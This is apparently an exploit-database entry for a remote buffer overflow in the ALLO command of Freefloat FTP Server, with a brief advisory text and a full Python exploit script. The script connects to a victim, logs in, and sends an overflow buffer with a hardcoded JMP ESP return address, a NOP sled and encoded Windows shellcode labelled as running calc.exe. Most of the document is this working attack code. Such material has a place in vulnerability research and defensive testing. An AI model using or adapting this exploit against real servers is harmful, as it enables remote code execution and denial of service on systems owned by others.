Freefloat FTP Server - 'ALLO' Remote Buffer Overflow

source: https://www.securityfocus.com/bid/49265/info

Freefloat FTP Server is prone to a buffer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. 

import socket
import sys

def usage():

        print "usage  : ./freefloatftp.py <victim_ip>  <victim_port>"
        print "example: ./freefloatftp.py 192.168.1.100 21"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


print "\n"	
print "#############################################################################"
print "#      Freefloat FTP Server ALLO Buffer Overflow Vulnerability Exploit      #"
print "#############################################################################"
print "\n"


if len(sys.argv) != 3:
	usage()
        sys.exit()

ip   = sys.argv[1]
port = sys.argv[2]

junk1= "\x41" * 246
ret  = "\xED\x1E\x94\x7C" #7C941EED JMP ESP
nop  = "\x90"* 200
# windows/exec          CMD=calc.exe
shellcode =("\x89\xe3\xdb\xd4\xd9\x73\xf4\x5d\x55\x59\x49\x49\x49\x49"
			"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
			"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
			"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
			"\x42\x75\x4a\x49\x4d\x6f\x58\x70\x56\x4f\x54\x70\x4d\x6e"
			"\x58\x59\x58\x4b\x54\x69\x5a\x69\x4d\x61\x56\x53\x4b\x69"
			"\x52\x54\x45\x74\x4b\x44\x43\x6a\x45\x61\x50\x7a\x45\x42"
			"\x4d\x53\x58\x42\x54\x44\x43\x33\x4d\x5a\x45\x71\x58\x52"
			"\x50\x4b\x4d\x46\x5a\x76\x4d\x4b\x4c\x74\x43\x56\x45\x77"
			"\x49\x6c\x45\x6d\x4c\x43\x56\x76\x54\x6e\x56\x39\x4b\x70"
			"\x54\x4b\x4b\x4e\x51\x39\x4d\x54\x4d\x77\x51\x65\x51\x6f"
			"\x45\x6c\x54\x73\x49\x6b\x4d\x78\x45\x63\x4c\x34\x58\x36"
			"\x4e\x6e\x50\x7a\x47\x75\x54\x37\x56\x6f\x58\x50\x4b\x75"
			"\x47\x69\x49\x63\x47\x5a\x54\x5a\x4b\x4a\x5a\x6a\x4b\x55"
			"\x50\x6f\x4b\x4b\x54\x4b\x45\x4b\x4d\x4f\x4d\x79\x58\x44"
			"\x56\x30\x54\x72\x51\x4e\x51\x70\x47\x54\x4e\x6f\x43\x6f"
			"\x4e\x46\x51\x33\x4c\x6f\x56\x47\x5a\x63\x5a\x53\x43\x74"
			"\x5a\x32\x49\x5a\x45\x73\x58\x74\x4e\x49\x4e\x65\x4b\x6b"
			"\x51\x6e\x49\x65\x50\x35\x49\x4a\x51\x43\x5a\x45\x56\x6a"
			"\x4d\x45\x4e\x38\x49\x4e\x49\x69\x56\x44\x54\x49\x54\x6f"
			"\x47\x71\x52\x37\x50\x75\x49\x6c\x47\x4c\x4e\x78\x50\x78"
			"\x4b\x4c\x52\x59\x47\x6e\x45\x33\x4c\x4b\x52\x51\x51\x4d"
			"\x47\x6e\x4e\x6c\x43\x71\x47\x6c\x4f\x34\x56\x79\x43\x64"
			"\x4c\x46\x4e\x6f\x4f\x4a\x4d\x6c\x56\x57\x47\x33\x43\x6c"
			"\x47\x46\x47\x4b\x47\x58\x45\x7a\x54\x50\x43\x6f\x4e\x4f"
			"\x4b\x4f\x54\x6a\x51\x4b\x54\x64\x49\x6e\x4b\x4c\x5a\x4a"
			"\x51\x6e\x56\x45\x4e\x39\x4c\x77\x54\x65\x43\x74\x54\x38"
			"\x47\x6d\x4c\x4b\x50\x79\x4c\x5a\x58\x79\x50\x74\x4b\x6c"
			"\x4e\x30\x5a\x4b\x51\x71\x52\x46\x4d\x6b\x45\x31\x51\x67"
			"\x58\x6a\x4b\x71\x5a\x6c\x52\x57\x4b\x44\x4b\x79\x51\x6e"
			"\x54\x50\x4f\x35\x43\x72\x56\x71\x50\x67\x5a\x7a\x4b\x30"
			"\x50\x56\x4f\x67\x4e\x70\x4b\x39\x49\x6e\x50\x30\x43\x4d"
			"\x51\x48\x52\x63\x51\x4d\x51\x6e\x58\x36\x4b\x37\x56\x38"
			"\x49\x6d\x54\x73\x52\x57\x4f\x6f\x47\x6d\x45\x66\x51\x62"
			"\x4b\x6b\x4c\x59\x4f\x5a\x54\x4e\x54\x34\x52\x6c\x58\x4d"
			"\x4d\x6d\x50\x75\x51\x55\x4c\x6e\x45\x70\x58\x66\x54\x45"
			"\x47\x6f\x5a\x67\x4c\x4e\x4e\x4c\x51\x4f\x41\x41")


buff   = junk1 + ret + nop + shellcode

try:
	print("[-] Connecting to " + ip + " on port " + port + "\n")
	s.connect((ip,int(port)))
	data = s.recv(1024)
	print("[-] Sending exploit...")
	s.send("USER test\r\n")
	s.recv(1024)
	s.send("PASS test\r\n")
	s.recv(1024)
	s.send("ALLO "+buff+"\r\n")
	s.close()
	print("[-] Exploit successfully sent...")
except:
	print("[-] Connection error...")
	print("[-] Check if victim is up.")